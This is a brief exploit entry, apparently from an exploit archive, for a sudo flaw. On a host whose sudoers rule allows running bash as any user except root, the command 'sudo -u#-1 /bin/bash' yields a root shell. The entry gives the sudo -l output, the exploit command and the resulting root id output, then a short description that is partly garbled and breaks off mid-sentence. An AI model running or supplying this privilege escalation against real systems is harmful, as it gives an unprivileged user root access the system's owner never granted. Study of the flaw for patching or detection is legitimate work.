sudo-l# User hacker may run the following commands on kali:# (ALL, !root) /bin/bash # Exploit sudo-u#-1 /bin/bash# root@kali:/home/hacker# id# uid=0(root) gid=1000(hacker) groups=1000(hacker)# root@kali:/home/hacker## Description: # Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
# -u#-1 returns as 0 which is root's id